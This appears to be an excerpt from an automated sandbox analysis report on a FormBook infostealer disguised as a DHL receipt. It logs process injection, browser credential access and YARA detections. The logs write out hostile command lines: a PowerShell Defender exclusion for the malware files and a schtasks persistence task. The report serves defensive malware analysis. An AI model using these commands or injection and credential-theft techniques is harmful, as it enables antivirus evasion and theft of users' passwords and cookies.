Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtCreateKey: Direct from: 0x76EF2C6C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe protection: read write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe protection: read write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: NULL target: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Thread register set: target process: 2272

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Thread APC queued: target process: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107F008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FD2008	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp26E1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: V7C903J7TTVs.exe, 00000010.00000000.2271587422.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000002.4574678540.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426279898.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: V7C903J7TTVs.exe, 00000010.00000000.2271587422.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000002.4574678540.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426279898.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: V7C903J7TTVs.exe, 00000010.00000000.2271587422.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000002.4574678540.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426279898.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: V7C903J7TTVs.exe, 00000010.00000000.2271587422.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000002.4574678540.0000000001591000.00000002.00000001.00040000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426279898.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.4573592974.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575252245.00000000040A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2351320245.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4577146791.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4575297734.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2349664896.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4575057978.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2354807978.0000000003C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
